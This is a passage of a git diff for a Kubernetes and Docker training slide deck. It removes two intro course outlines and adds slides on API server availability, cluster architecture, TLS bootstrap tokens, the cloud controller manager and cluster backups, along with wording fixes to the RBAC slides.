--- a/slides/intro-fullday.yml
+++ b/slides/intro-fullday.yml
@@ -1,85 +0,0 @@
-title: |
-  Bien d&eacute;marrer
-  avec les conteneurs
-
-#chat: "[Slack](https://dockercommunity.slack.com/messages/C7GKACWDV)"
-chat: "[Gitter](https://gitter.im/enix/formation-docker-20190415)"
-
-gitrepo: github.com/jpetazzo/container.training
-
-slides: http://intro-2019-04.container.training/
-
-exclude:
- self-paced
-
-chapters:
- shared/title.md
- logistics.md
- containers/intro.md
- shared/about-slides.md
- shared/toc.md
- - containers/Docker_Overview.md
-  #- containers/Docker_History.md
-  - containers/Training_Environment.md
-  - containers/Installing_Docker.md
-  - containers/First_Containers.md
-  - containers/Background_Containers.md
-  - containers/Start_And_Attach.md
- - containers/Initial_Images.md
-  - containers/Building_Images_Interactively.md
-  - containers/Building_Images_With_Dockerfiles.md
-  - containers/Cmd_And_Entrypoint.md
- - containers/Copying_Files_During_Build.md
-  - |
-      # Exercise — writing Dockerfiles
-
-      Let's write Dockerfiles for an existing application!
-
-      The code is at: https://github.com/jpetazzo/wordsmith
-
-  - containers/Multi_Stage_Builds.md
-  - containers/Publishing_To_Docker_Hub.md
-  - containers/Dockerfile_Tips.md
-  - |
-      # Exercise — writing better Dockerfiles
-
-      Let's update our Dockerfiles to leverage multi-stage builds!
-
-      The code is at: https://github.com/jpetazzo/wordsmith
-
-      Use a different tag for these images, so that we can compare their sizes.
-
-      What's the size difference between single-stage and multi-stage builds?
-
- - containers/Naming_And_Inspecting.md
-  - containers/Labels.md
-  - containers/Getting_Inside.md
-  - containers/Resource_Limits.md
- - containers/Container_Networking_Basics.md
-  - containers/Network_Drivers.md
-  - containers/Container_Network_Model.md
-  #- containers/Connecting_Containers_With_Links.md
-  - containers/Ambassadors.md
- - containers/Local_Development_Workflow.md
-  - containers/Windows_Containers.md
-  - containers/Working_With_Volumes.md
-  - containers/Compose_For_Dev_Stacks.md
-  - |
-      # Exercise — writing a Compose file
-
-      Let's write a Compose file for the wordsmith app!
-
-      The code is at: https://github.com/jpetazzo/wordsmith
-
- - containers/Docker_Machine.md
-  - containers/Advanced_Dockerfiles.md
-  - containers/Application_Configuration.md
-  - containers/Logging.md
- - containers/Namespaces_Cgroups.md
-  - containers/Copy_On_Write.md
-  #- containers/Containers_From_Scratch.md
- - containers/Container_Engines.md
-  #- containers/Ecosystem.md
-  - containers/Orchestration_Overview.md
-  - shared/thankyou.md
-  - containers/links.md
--- a/slides/intro-selfpaced.yml
+++ b/slides/intro-selfpaced.yml
@@ -1,60 +0,0 @@
-title: |
-  Introduction
-  to Containers
-
-chat: "[Slack](https://dockercommunity.slack.com/messages/C7GKACWDV)"
-#chat: "[Gitter](https://gitter.im/jpetazzo/workshop-yyyymmdd-city)"
-
-gitrepo: github.com/jpetazzo/container.training
-
-slides: http://container.training/
-
-exclude:
- in-person
-
-chapters:
- shared/title.md
-# - shared/logistics.md
- containers/intro.md
- shared/about-slides.md
- shared/toc.md
- - containers/Docker_Overview.md
-  - containers/Docker_History.md
-  - containers/Training_Environment.md
-  - containers/Installing_Docker.md
-  - containers/First_Containers.md
-  - containers/Background_Containers.md
-  - containers/Start_And_Attach.md
- - containers/Initial_Images.md
-  - containers/Building_Images_Interactively.md
-  - containers/Building_Images_With_Dockerfiles.md
-  - containers/Cmd_And_Entrypoint.md
-  - containers/Copying_Files_During_Build.md
- - containers/Multi_Stage_Builds.md
-  - containers/Publishing_To_Docker_Hub.md
-  - containers/Dockerfile_Tips.md
- - containers/Naming_And_Inspecting.md
-  - containers/Labels.md
-  - containers/Getting_Inside.md
- - containers/Container_Networking_Basics.md
-  - containers/Network_Drivers.md
-  - containers/Container_Network_Model.md
-  #- containers/Connecting_Containers_With_Links.md
-  - containers/Ambassadors.md
- - containers/Local_Development_Workflow.md
-  - containers/Windows_Containers.md
-  - containers/Working_With_Volumes.md
-  - containers/Compose_For_Dev_Stacks.md
-  - containers/Docker_Machine.md
- - containers/Advanced_Dockerfiles.md
-  - containers/Application_Configuration.md
-  - containers/Logging.md
-  - containers/Resource_Limits.md
- - containers/Namespaces_Cgroups.md
-  - containers/Copy_On_Write.md
-  #- containers/Containers_From_Scratch.md
- - containers/Container_Engines.md
-  - containers/Ecosystem.md
-  - containers/Orchestration_Overview.md
-  - shared/thankyou.md
-  - containers/links.md
--- a/slides/k8s/apilb.md
+++ b/slides/k8s/apilb.md
@@ -0,0 +1,89 @@
+# API server availability
+
+- When we set up a node, we need the address of the API server:
+
+  - for kubelet
+
+  - for kube-proxy
+
+  - sometimes for the pod network system (like kube-router)
+
+- How do we ensure the availability of that endpoint?
+
+  (what if the node running the API server goes down?)
+
+---
+
+## Option 1: external load balancer
+
+- Set up an external load balancer
+
+- Point kubelet (and other components) to that load balancer
+
+- Put the node(s) running the API server behind that load balancer
+
+- Update the load balancer if/when an API server node needs to be replaced
+
+- On cloud infrastructures, some mechanisms provide automation for this
+
+  (e.g. on AWS, an Elastic Load Balancer + Auto Scaling Group)
+
+- [Example in Kubernetes The Hard Way](https://github.com/kelseyhightower/kubernetes-the-hard-way/blob/master/docs/08-bootstrapping-kubernetes-controllers.md#the-kubernetes-frontend-load-balancer)
+
+---
+
+## Option 2: local load balancer
+
+- Set up a load balancer (like NGINX, HAProxy...) on *each* node
+
+- Configure that load balancer to send traffic to the API server node(s)
+
+- Point kubelet (and other components) to `localhost`
+
+- Update the load balancer configuration when API server nodes are updated
+
+---
+
+## Updating the local load balancer config
+
+- Distribute the updated configuration (push)
+
+- Or regularly check for updates (pull)
+
+- The latter requires an external, highly available store
+ 
+  (it could be an object store, an HTTP server, or even DNS...)
+
+- Updates can be facilitated by a DaemonSet
+
+  (but remember that it can't be used when installing a new node!)
+
+---
+
+## Option 3: DNS records
+
+- Put all the API server nodes behind a round-robin DNS
+
+- Point kubelet (and other components) to that name
+
+- Update the records when needed
+
+- Note: this option is not officially supported
+
+  (but since kubelet supports reconnection anyway, it *should* work)
+
+---
+
+## Option 4: ....................
+
+- Many managed clusters expose a high-availability API endpoint
+
+  (and you don't have to worry about it)
+
+- You can also use HA mechanisms that you're familiar with
+
+  (e.g. virtual IPs)
+
+- Tunnels are also fine
+
+  (e.g. [k3s](https://k3s.io/) uses a tunnel to allow each node to contact the API server)
--- a/slides/k8s/architecture.md
+++ b/slides/k8s/architecture.md
@@ -0,0 +1,383 @@
+# Kubernetes architecture
+
+We can arbitrarily split Kubernetes into two parts:
+
+- the *nodes*, a set of machines that run our containerized workloads;
+
+- the *control plane*, a set of processes implementing the Kubernetes APIs.
+
+Kubernetes also relies on underlying infrastructure:
+
+- servers, network connectivity (obviously!),
+
+- optional components like storage systems, load balancers...
+
+---
+
+## Control plane location
+
+The control plane can run:
+
+- in containers, on the same nodes that run other application workloads
+
+  (example: Minikube; 1 node runs everything)
+
+- on a dedicated node
+
+  (example: a cluster installed with kubeadm)
+
+- on a dedicated set of nodes
+
+  (example: Kubernetes The Hard Way; kops)
+
+- outside of the cluster
+
+  (example: most managed clusters like AKS, EKS, GKE)
+
+---
+
+class: pic
+
+![Kubernetes architecture diagram: control plane and nodes](images/k8s-arch2.png)
+
+---
+
+## What runs on a node
+
+- Our containerized workloads
+
+- A container engine like Docker, CRI-O, containerd...
+
+  (in theory, the choice doesn't matter, as the engine is abstracted by Kubernetes)
+
+- kubelet: an agent connecting the node to the cluster
+
+  (it connects to the API server, registers the node, receives instructions)
+
+- kube-proxy: a component used for internal cluster communication
+
+  (note that this is *not* an overlay network or a CNI plugin!)
+
+---
+
+## What's in the control plane
+
+- Everything is stored in etcd
+
+  (it's the only stateful component)
+
+- Everyone communicates exclusively through the API server:
+
+  - we (users) interact with the cluster through the API server
+
+  - the nodes register and get their instructions through the API server
+
+  - the other control plane components also register with the API server
+
+- API server is the only component that reads/writes from/to etcd
+
+---
+
+## Communication protocols: API server
+
+- The API server exposes a REST API
+
+  (except for some calls, e.g. to attach interactively to a container)
+
+- Almost all requests and responses are JSON following a strict format
+
+- For performance, the requests and responses can also be done over protobuf
+
+  (see this [design proposal](https://github.com/kubernetes/community/blob/master/contributors/design-proposals/api-machinery/protobuf.md) for details)
+
+- In practice, protobuf is used for all internal communication
+
+  (between control plane components, and with kubelet)
+
+---
+
+## Communication protocols: on the nodes
+
+The kubelet agent uses a number of special-purpose protocols and interfaces, including:
+
+- CRI (Container Runtime Interface)
+
+  - used for communication with the container engine
+  - abstracts the differences between container engines
+  - based on gRPC+protobuf
+
+- [CNI (Container Network Interface)](https://github.com/containernetworking/cni/blob/master/SPEC.md)
+
+  - used for communication with network plugins
+  - network plugins are implemented as executable programs invoked by kubelet
+  - network plugins provide IPAM
+  - network plugins set up network interfaces in pods
+
+---
+
+class: pic
+
+![Kubernetes architecture diagram: communication between components](images/k8s-arch4-thanks-luxas.png)
+
+---
+
+# The Kubernetes API
+
+[
+*The Kubernetes API server is a "dumb server" which offers storage, versioning, validation, update, and watch semantics on API resources.*
+](
+https://github.com/kubernetes/community/blob/master/contributors/design-proposals/api-machinery/protobuf.md#proposal-and-motivation
+)
+
+([Clayton Coleman](https://twitter.com/smarterclayton), Kubernetes Architect and Maintainer)
+
+What does that mean?
+
+---
+
+## The Kubernetes API is declarative
+
+- We cannot tell the API, "run a pod"
+
+- We can tell the API, "here is the definition for pod X"
+
+- The API server will store that definition (in etcd)
+
+- *Controllers* will then wake up and create a pod matching the definition
+
+---
+
+## The core features of the Kubernetes API
+
+- We can create, read, update, and delete objects
+
+- We can also *watch* objects
+
+  (be notified when an object changes, or when an object of a given type is created)
+
+- Objects are strongly typed
+
+- Types are *validated* and *versioned*
+
+- Storage and watch operations are provided by etcd
+
+  (note: the [k3s](https://k3s.io/) project allows us to use sqlite instead of etcd)
+
+---
+
+## Let's experiment a bit!
+
+- For the exercises in this section, connect to the first node of the `test` cluster
+
+.exercise[
+
+- SSH to the first node of the test cluster
+
+- Check that the cluster is operational:
+  ```bash
+  kubectl get nodes
+  ```
+
+- All nodes should be `Ready`
+
+]
+
+---
+
+## Create
+
+- Let's create a simple object
+
+.exercise[
+
+- Create a namespace with the following command:
+  ```bash
+    kubectl create -f- <<EOF
+    apiVersion: v1
+    kind: Namespace
+    metadata:
+      name: hello
+    EOF
+  ```
+
+]
+
+This is equivalent to `kubectl create namespace hello`.
+
+---
+
+## Read
+
+- Let's retrieve the object we just created
+
+.exercise[
+
+- Read back our object:
+  ```bash
+  kubectl get namespace hello -o yaml
+  ```
+
+]
+
+We see a lot of data that wasn't here when we created the object.
+
+Some data was automatically added to the object (like `spec.finalizers`).
+
+Some data is dynamic (typically, the content of `status`).
+
+---
+
+## API requests and responses
+
+- Almost every Kubernetes API payload (requests and responses) has the same format:
+  ```yaml
+    apiVersion: xxx
+    kind: yyy
+    metadata:
+      name: zzz
+      (more metadata fields here)
+    (more fields here)
+  ```
+
+- The fields shown above are mandatory, except for some special cases
+
+  (e.g.: in lists of resources, the list itself doesn't have a `metadata.name`)
+
+- We show YAML for convenience, but the API uses JSON
+
+  (with optional protobuf encoding)
+
+---
+
+class: extra-details
+
+## API versions
+
+- The `apiVersion` field corresponds to an *API group*
+
+- It can be either `v1` (aka "core group" or "legacy group"), or `group/version`; e.g.:
+
+  - `apps/v1`
+  - `rbac.authorization.k8s.io/v1`
+  - `extensions/v1beta1`
+
+- It does not indicate which version of Kubernetes we're talking about
+
+- It *indirectly* indicates the version of the `kind`
+
+  (which fields exist, their format, which ones are mandatory...)
+
+- A single resource type (`kind`) is rarely versioned alone
+
+  (e.g.: the `batch` API group contains `jobs` and `cronjobs`)
+
+---
+
+## Update
+
+- Let's update our namespace object
+
+- There are many ways to do that, including:
+
+  - `kubectl apply` (and provide an updated YAML file)
+  - `kubectl edit`
+  - `kubectl patch`
+  - many helpers, like `kubectl label`, or `kubectl set`
+
+- In each case, `kubectl` will:
+
+  - get the current definition of the object
+  - compute changes
+  - submit the changes (with `PATCH` requests)
+
+---
+
+## Adding a label
+
+- For demonstration purposes, let's add a label to the namespace
+
+- The easiest way is to use `kubectl label`
+
+.exercise[
+
+- In one terminal, watch namespaces:
+  ```bash
+  kubectl get namespaces --show-labels -w
+  ```
+
+- In the other, update our namespace:
+  ```bash
+  kubectl label namespaces hello color=purple
+  ```
+
+]
+
+We demonstrated *update* and *watch* semantics.
+
+---
+
+## What's special about *watch*?
+
+- The API server itself doesn't do anything: it's just a fancy object store
+
+- All the actual logic in Kubernetes is implemented with *controllers*
+
+- A *controller* watches a set of resources, and takes action when they change
+
+- Examples:
+
+  - when a Pod object is created, it gets scheduled and started
+
+  - when a Pod belonging to a ReplicaSet terminates, it gets replaced
+
+  - when a Deployment object is updated, it can trigger a rolling update
+
+---
+
+# Other control plane components
+
+- API server ✔️
+
+- etcd ✔️
+
+- Controller manager
+
+- Scheduler
+
+---
+
+## Controller manager
+
+- This is a collection of loops watching all kinds of objects
+
+- That's where the actual logic of Kubernetes lives
+
+- When we create a Deployment (e.g. with `kubectl run web --image=nginx`),
+
+  - we create a Deployment object
+
+  - the Deployment controller notices it, and creates a ReplicaSet
+
+  - the ReplicaSet controller notices the ReplicaSet, and creates a Pod
+
+---
+
+## Scheduler
+
+- When a pod is created, it is in `Pending` state
+
+- The scheduler (or rather: *a scheduler*) must bind it to a node
+
+  - Kubernetes comes with an efficient scheduler with many features
+
+  - if we have special requirements, we can add another scheduler
+    <br/>
+    (example: this [demo scheduler](https://github.com/kelseyhightower/scheduler) uses the cost of nodes, stored in node annotations)
+
+- A pod might stay in `Pending` state for a long time:
+
+  - if the cluster is full
+
+  - if the pod has special constraints that can't be met
+
+  - if the scheduler is not running (!)
--- a/slides/k8s/authn-authz.md
+++ b/slides/k8s/authn-authz.md
@@ -22,7 +22,7 @@

 - When the API server receives a request, it tries to authenticate it

-  (it examines headers, certificates ... anything available)
+  (it examines headers, certificates... anything available)

 - Many authentication methods are available and can be used simultaneously

@@ -34,7 +34,7 @@
  - the user ID
  - a list of groups

- The API server doesn't interpret these; it'll be the job of *authorizers*
+- The API server doesn't interpret these; that'll be the job of *authorizers*

 ---

@@ -50,7 +50,7 @@

 - [HTTP basic auth](https://en.wikipedia.org/wiki/Basic_access_authentication)

-  (carrying user and password in a HTTP header)
+  (carrying user and password in an HTTP header)

 - Authentication proxy

@@ -88,7 +88,7 @@

  (i.e. they are not stored in etcd or anywhere else)

- Users can be created (and given membership to groups) independently of the API
+- Users can be created (and added to groups) independently of the API

 - The Kubernetes API can be set up to use your custom CA to validate client certs

@@ -143,19 +143,21 @@ class: extra-details

  (see issue [#18982](https://github.com/kubernetes/kubernetes/issues/18982))

- As a result, we cannot easily suspend a user's access
+- As a result, we don't have an easy way to terminate someone's access

- There are workarounds, but they are very inconvenient:
+  (if their key is compromised, or they leave the organization)

-  - issue short-lived certificates (e.g. 24 hours) and regenerate them often
+- Option 1: re-create a new CA and re-issue everyone's certificates 
+  <br/>
+  → Maybe OK if we only have a few users; no way otherwise

-  - re-create the CA and re-issue all certificates in case of compromise
+- Option 2: don't use groups; grant permissions to individual users
+  <br/>
+  → Inconvenient if we have many users and teams; error-prone

-  - grant permissions to individual users, not groups
-    <br/>
-    (and remove all permissions to a compromised user)
-
- Until this is fixed, we probably want to use other methods
+- Option 3: issue short-lived certificates (e.g. 24 hours) and renew them often
+  <br/>
+  → This can be facilitated by e.g. Vault or by the Kubernetes CSR API

 ---

@@ -191,7 +193,7 @@ class: extra-details

  (the kind that you can view with `kubectl get secrets`)

- Service accounts are generally used to grant permissions to applications, services ...
+- Service accounts are generally used to grant permissions to applications, services...

  (as opposed to humans)

@@ -215,7 +217,7 @@ class: extra-details

 .exercise[

- The resource name is `serviceaccount` or `sa` in short:
+- The resource name is `serviceaccount` or `sa` for short:
  ```bash
  kubectl get sa
  ```
@@ -307,7 +309,7 @@ class: extra-details

 - The API "sees" us as a different user

- But neither user has any right, so we can't do nothin'
+- But neither user has any rights, so we can't do nothin'

 - Let's change that!

@@ -337,9 +339,9 @@ class: extra-details

 - A rule is a combination of:

-  - [verbs](https://kubernetes.io/docs/reference/access-authn-authz/authorization/#determine-the-request-verb) like create, get, list, update, delete ...
+  - [verbs](https://kubernetes.io/docs/reference/access-authn-authz/authorization/#determine-the-request-verb) like create, get, list, update, delete...

-  - resources (as in "API resource", like pods, nodes, services ...)
+  - resources (as in "API resource," like pods, nodes, services...)

  - resource names (to specify e.g. one specific pod instead of all pods)

@@ -373,13 +375,13 @@ class: extra-details

 - We can also define API resources ClusterRole and ClusterRoleBinding

- These are a superset, allowing to:
+- These are a superset, allowing us to:

  - specify actions on cluster-wide objects (like nodes)

  - operate across all namespaces

- We can create Role and RoleBinding resources within a namespaces
+- We can create Role and RoleBinding resources within a namespace

 - ClusterRole and ClusterRoleBinding resources are global

@@ -387,13 +389,13 @@ class: extra-details

 ## Pods and service accounts

- A pod can be associated to a service account
+- A pod can be associated with a service account

-  - by default, it is associated to the `default` service account
+  - by default, it is associated with the `default` service account

-  - as we've seen earlier, this service account has no permission anyway
+  - as we saw earlier, this service account has no permissions anyway

- The associated token is exposed into the pod's filesystem
+- The associated token is exposed to the pod's filesystem

  (in `/var/run/secrets/kubernetes.io/serviceaccount/token`)

@@ -407,7 +409,7 @@ class: extra-details

 - We are going to create a service account

- We will use an existing cluster role (`view`)
+- We will use a default cluster role (`view`)

 - We will bind together this role and this service account

@@ -458,7 +460,7 @@ class: extra-details

 ]

-It's important to note a couple of details in these flags ...
+It's important to note a couple of details in these flags...

 ---

@@ -491,13 +493,13 @@ It's important to note a couple of details in these flags ...

  - again, the command would have worked fine (no error)

-  - ... but our API requests would have been denied later
+  - ...but our API requests would have been denied later

 - What's about the `default:` prefix?

  - that's the namespace of the service account

-  - yes, it could be inferred from context, but ... `kubectl` requires it
+  - yes, it could be inferred from context, but... `kubectl` requires it

 ---

@@ -574,6 +576,51 @@ It's important to note a couple of details in these flags ...

 class: extra-details

+## Where does this `view` role come from?
+
+- Kubernetes defines a number of ClusterRoles intended to be bound to users
+
+- `cluster-admin` can do *everything* (think `root` on UNIX)
+
+- `admin` can do *almost everything* (except e.g. changing resource quotas and limits)
+
+- `edit` is similar to `admin`, but cannot view or edit permissions
+
+- `view` has read-only access to most resources, except permissions and secrets
+
+*In many situations, these roles will be all you need.*
+
+*You can also customize them!*
+
+---
+
+class: extra-details
+
+## Customizing the default roles
+
+- If you need to *add* permissions to these default roles (or others),
+  <br/>
+  you can do it through the [ClusterRole Aggregation](https://kubernetes.io/docs/reference/access-authn-authz/rbac/#aggregated-clusterroles) mechanism
+
+- This happens by creating a ClusterRole with the following labels:
+  ```yaml
+    metadata:
+      labels:
+        rbac.authorization.k8s.io/aggregate-to-admin: "true"
+        rbac.authorization.k8s.io/aggregate-to-edit: "true"
+        rbac.authorization.k8s.io/aggregate-to-view: "true"
+  ```
+
+- This ClusterRole's permissions will be added to `admin`/`edit`/`view` respectively
+
+- This is particularly useful when using CustomResourceDefinitions
+
+  (since Kubernetes cannot guess which resources are sensitive and which ones aren't)
+
+---
+
+class: extra-details
+
 ## Where do our permissions come from?

 - When interacting with the Kubernetes API, we are using a client certificate
@@ -605,7 +652,7 @@ class: extra-details
  kubectl describe clusterrolebinding cluster-admin
  ```

- This binding associates `system:masters` to the cluster role `cluster-admin`
+- This binding associates `system:masters` with the cluster role `cluster-admin`

 - And the `cluster-admin` is, basically, `root`:
  ```bash
@@ -620,7 +667,7 @@ class: extra-details

 - For auditing purposes, sometimes we want to know who can perform an action

- Here is a proof-of-concept tool by Aqua Security, doing exactly that:
+- There is a proof-of-concept tool by Aqua Security which does exactly that:

  https://github.com/aquasecurity/kubectl-who-can

--- a/slides/k8s/bootstrap.md
+++ b/slides/k8s/bootstrap.md
@@ -0,0 +1,259 @@
+# TLS bootstrap
+
+- kubelet needs TLS keys and certificates to communicate with the control plane
+
+- How do we generate this information?
+
+- How do we make it available to kubelet?
+
+---
+
+## Option 1: push
+
+- When we want to provision a node:
+
+  - generate its keys and certificate, and sign the certificate centrally
+
+  - push the files to the node
+
+- OK for "traditional", on-premises deployments
+
+- Not OK for cloud deployments with auto-scaling
+
+---
+
+## Option 2: poll + push
+
+- Discover nodes when they are created
+
+  (e.g. with cloud API)
+
+- When we detect a new node, push TLS material to the node
+
+  (like in option 1)
+
+- It works, but:
+
+  - discovery code is specific to each provider
+
+  - relies heavily on the cloud provider API
+
+  - doesn't work on-premises
+
+  - doesn't scale
+
+---
+
+## Option 3: bootstrap tokens + CSR API
+
+- Since Kubernetes 1.4, the Kubernetes API supports CSR
+
+  (Certificate Signing Requests)
+
+- This is similar to the protocol used to obtain e.g. HTTPS certificates:
+
+  - subject (here, kubelet) generates TLS keys and CSR
+
+  - subject submits CSR to CA
+
+  - CA validates (or not) the CSR
+
+  - CA sends back signed certificate to subject
+
+- This is combined with *bootstrap tokens*
+
+---
+
+## Bootstrap tokens
+
+- A [bootstrap token](https://kubernetes.io/docs/reference/access-authn-authz/bootstrap-tokens/) is an API access token
+
+  - it is a Secret with type `bootstrap.kubernetes.io/token`
+
+  - it is 6 public characters (ID) + 16 secret characters
+    <br/>(example: `whd3pq.d1ushuf6ccisjacu`)
+
+  - it gives access to groups `system:bootstrap:<ID>` and `system:bootstrappers`
+
+  - additional groups can be specified in the Secret
+
+---
+
+## Bootstrap tokens with kubeadm
+
+- kubeadm automatically creates a bootstrap token
+
+  (it is shown at the end of `kubeadm init`)
+
+- That token adds the group `system:bootstrappers:kubeadm:default-node-token`
+
+- kubeadm also creates a ClusterRoleBinding `kubeadm:kubelet-bootstrap`
+  <br/>binding `...:default-node-token` to ClusterRole `system:node-bootstrapper`
+
+- That ClusterRole gives create/get/list/watch permissions on the CSR API
+
+---
+
+## Bootstrap tokens in practice
+
+- Let's list our bootstrap tokens on a cluster created with kubeadm
+
+.exercise[
+
+- Log into node `test1`
+
+- View bootstrap tokens:
+  ```bash
+  sudo kubeadm token list
+  ```
+
+]
+
+- Tokens are short-lived
+
+- We can create new tokens with `kubeadm` if necessary
+
+---
+
+class: extra-details
+
+## Retrieving bootstrap tokens with kubectl
+
+- Bootstrap tokens are Secrets with type `bootstrap.kubernetes.io/token`
+
+- Token ID and secret are in data fields `token-id` and `token-secret`
+
+- In Secrets, data fields are encoded with Base64
+
+- This "very simple" command will show us the tokens:
+
+```
+kubectl -n kube-system get secrets -o json | 
+        jq -r '.items[] 
+        | select(.type=="bootstrap.kubernetes.io/token")
+        | ( .data["token-id"] + "Lg==" + .data["token-secret"] + "Cg==")
+        ' | base64 -d
+```
+
+(On recent versions of `jq`, you can simplify by using filter `@base64d`.)
+
+---
+
+class: extra-details
+
+## Using a bootstrap token
+
+- The token we need to use has the form `abcdef.1234567890abcdef`
+
+.exercise[
+
+- Check that it is accepted by the API server:
+  ```bash
+  curl -k -H "Authorization: Bearer abcdef.1234567890abcdef" https://10.96.0.1/
+  ```
+
+- We should see that we are *authenticated* but not *authorized*:
+  ```
+  User \"system:bootstrap:abcdef\" cannot get path \"/\""
+  ```
+
+- Check that we can access the CSR API:
+  ```bash
+  curl -k -H "Authorization: Bearer abcdef.1234567890abcdef" \
+       https://10.96.0.1/apis/certificates.k8s.io/v1beta1/certificatesigningrequests
+  ```
+
+]
+
+---
+
+## The cluster-info ConfigMap
+
+- Before we can talk to the API, we need:
+
+  - the API server address (obviously!)
+
+  - the cluster CA certificate
+
+- That information is stored in a public ConfigMap
+
+.exercise[
+
+- Retrieve that ConfigMap:
+  ```bash
+  curl -k https://10.96.0.1/api/v1/namespaces/kube-public/configmaps/cluster-info
+  ```
+
+]
+
+*Extracting the kubeconfig file is left as an exercise for the reader.*
+
+---
+
+class: extra-details
+
+## Signature of the config-map
+
+- You might have noticed a few `jws-kubeconfig-...` fields
+
+- These are config-map signatures
+
+  (so that the client can protect against MITM attacks)
+
+- These are JWS signatures using HMAC-SHA256
+
+  (see [here](https://kubernetes.io/docs/reference/access-authn-authz/bootstrap-tokens/#configmap-signing) for more details)
+
+---
+
+## Putting it all together
+
+This is the TLS bootstrap mechanism, step by step.
+
+- The node uses the cluster-info ConfigMap to get the cluster CA certificate
+
+- The node generates its keys and CSR
+
+- Using the bootstrap token, the node creates a CertificateSigningRequest object
+
+- The node watches the CSR object
+
+- The CSR object is accepted (automatically or by an admin)
+
+- The node gets notified, and retrieves the certificate
+
+- The node can now join the cluster
+
+---
+
+## Bottom line
+
+- If you paid attention, you noticed that we still need a way to:
+
+  - either safely get the bootstrap token to the nodes
+
+  - or disable auto-approval and manually approve the nodes when they join
+
+- The goal of the TLS bootstrap mechanism is *not* to solve this
+
+  (from an information-theory standpoint, it's fundamentally impossible!)
+
+- But it reduces the differences between environments, infrastructures, providers...
+
+- It gives a mechanism that is easier to use, and flexible enough, for most scenarios
+
+---
+
+## More information
+
+- As always, the Kubernetes documentation has extra details:
+
+  - [TLS management](https://kubernetes.io/docs/tasks/tls/managing-tls-in-a-cluster/)
+
+  - [Authenticating with bootstrap tokens](https://kubernetes.io/docs/reference/access-authn-authz/bootstrap-tokens/)
+
+  - [TLS bootstrapping](https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet-tls-bootstrapping/)
+
+  - [kubeadm token](https://kubernetes.io/docs/reference/setup-tools/kubeadm/kubeadm-token/) command
+
+  - [kubeadm join](https://kubernetes.io/docs/reference/setup-tools/kubeadm/kubeadm-join/) command (has details about [the join workflow](https://kubernetes.io/docs/reference/setup-tools/kubeadm/kubeadm-join/#join-workflow))
--- a/slides/k8s/cloud-controller-manager.md
+++ b/slides/k8s/cloud-controller-manager.md
@@ -0,0 +1,144 @@
+# The Cloud Controller Manager
+
+- Kubernetes has many features that are cloud-specific
+
+  (e.g. providing cloud load balancers when a Service of type LoadBalancer is created)
+
+- These features were initially implemented in API server and controller manager
+
+- Since Kubernetes 1.6, these features are available through a separate process:
+
+  the *Cloud Controller Manager*
+
+- The CCM is optional, but if we run in a cloud, we probably want it!
+
+---
+
+## Cloud Controller Manager duties
+
+- Creating and updating cloud load balancers
+
+- Configuring routing tables in the cloud network (specific to GCE)
+
+- Updating node labels to indicate region, zone, instance type...
+
+- Obtaining node name, internal and external addresses from cloud metadata service
+
+- Deleting nodes from Kubernetes when they're deleted in the cloud
+
+- Managing *some* volumes (e.g. EBS volumes, AzureDisks...)
+
+  (Eventually, volumes will be managed by the Container Storage Interface)
+
+---
+
+## In-tree vs. out-of-tree
+
+- A number of cloud providers are supported "in-tree"
+
+  (in the main kubernetes/kubernetes repository on GitHub)
+
+- More cloud providers are supported "out-of-tree"
+
+  (with code in different repositories)
+
+- There is an [ongoing effort](https://github.com/kubernetes/kubernetes/tree/master/pkg/cloudprovider) to move everything to out-of-tree providers
+
+---
+
+## In-tree providers
+
+The following providers are actively maintained:
+
+- Amazon Web Services
+- Azure
+- Google Compute Engine
+- IBM Cloud
+- OpenStack
+- VMware vSphere
+
+These ones are less actively maintained:
+
+- Apache CloudStack
+- oVirt
+- VMware Photon
+
+---
+
+## Out-of-tree providers
+
+The list includes the following providers:
+
+- DigitalOcean
+
+- keepalived (not exactly a cloud; provides VIPs for load balancers)
+
+- Linode
+
+- Oracle Cloud Infrastructure
+
+(And possibly others; there is no central registry for these.)
+
+---
+
+## Audience questions
+
+- What kind of clouds are you using/planning to use?
+
+- What kind of details would you like to see in this section?
+
+- Would you appreciate details on clouds that you don't / won't use?
+
+---
+
+## Cloud Controller Manager in practice
+
+- Write a configuration file
+
+  (typically `/etc/kubernetes/cloud.conf`)
+
+- Run the CCM process
+
+  (on self-hosted clusters, this can be a DaemonSet selecting the control plane nodes)
+
+- Start kubelet with `--cloud-provider=external`
+
+- When using managed clusters, this is done automatically
+
+- There is very little documentation on writing the configuration file
+
+  (except for OpenStack)
+
+---
+
+## Bootstrapping challenges
+
+- When a node joins the cluster, it needs to obtain a signed TLS certificate
+
+- That certificate must contain the node's addresses
+
+- These addresses are provided by the Cloud Controller Manager
+
+  (at least the external address)
+
+- To get these addresses, the node needs to communicate with the control plane
+
+- ...Which means joining the cluster
+
+(The problem didn't occur when cloud-specific code was running in kubelet: kubelet could obtain the required information directly from the cloud provider's metadata service.)
+
+---
+
+## More information about CCM
+
+- CCM configuration and operation are highly specific to each cloud provider
+
+  (which is why this section remains very generic)
+
+- The Kubernetes documentation has *some* information:
+
+  - [architecture and diagrams](https://kubernetes.io/docs/concepts/architecture/cloud-controller/)
+
+  - [configuration](https://kubernetes.io/docs/concepts/cluster-administration/cloud-providers/) (mainly for OpenStack)
+
+  - [deployment](https://kubernetes.io/docs/tasks/administer-cluster/running-cloud-controller/)
--- a/slides/k8s/cluster-backup.md
+++ b/slides/k8s/cluster-backup.md
@@ -0,0 +1,362 @@
+# Backing up clusters
+
+- Backups can have multiple purposes:
+
+  - disaster recovery (servers or storage are destroyed or unreachable)
+
+  - error recovery (human or process has altered or corrupted data)
+
+  - cloning environments (for testing, validation...)
+
+- Let's see the strategies and tools available with Kubernetes!
+
+---
+
+## Important
+
+- Kubernetes helps us with disaster recovery
+
+  (it gives us replication primitives)
+
+- Kubernetes helps us clone / replicate environments
+
+  (all resources can be described with manifests)
+
+- Kubernetes *does not* help us with error recovery
+
+- We still need to back up/snapshot our data:
+
+  - with database backups (mysqldump, pg_dump, etc.)
+
+  - and/or snapshots at the storage layer
+
+  - and/or traditional full disk backups
+
+---
+
+## In a perfect world ...
+
+- The deployment of our Kubernetes clusters is automated
+
+  (recreating a cluster takes less than a minute of human time)
+
+- All the resources (Deployments, Services...) on our clusters are under version control
+
+  (never use `kubectl run`; always apply YAML files coming from a repository)
+
+- Stateful components are either:
+
+  - stored on systems with regular snapshots
+
+  - backed up regularly to an external, durable storage
+
+  - outside of Kubernetes
+
+---
+
+## Kubernetes cluster deployment
+
+- If our deployment system isn't fully automated, it should at least be documented
+
